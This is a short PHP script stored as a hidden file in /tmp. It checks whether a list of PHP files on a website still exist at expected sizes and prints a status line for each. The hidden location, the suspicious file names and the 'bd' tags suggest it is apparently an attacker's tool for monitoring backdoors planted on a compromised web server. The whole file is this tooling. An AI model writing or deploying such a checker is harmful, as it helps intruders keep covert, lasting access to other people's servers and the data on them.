File: //tmp/.holder
<?php $r = '/home/vitanhod/wepatol.vitavit.com.pk'; $x = ["/includes/configOnline.php"=>"bd@@1269229@@76",
"/includes/config.php"=>"bd@@1269439@@63",
"/xml_domit_shared.php"=>"bd@@1276545@@38",
"/orderemail_bk.php"=>"bd@@1269129@@88",
"/includes/usergroup_14.php"=>"bd@@1268642@@959",
"/img/Amemberlist.php"=>"bd@@1276372@@94",
"/xml_domit_shared.php"=>"bd@@1269521@@856",
"/includes/usergroup.php"=>"bd@@1309750@@906",
"/img/Amemberlist.php"=>"bd@@1269560@@831",
"/includes/usergroup_14.php"=>"bd@@1276221@@30"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');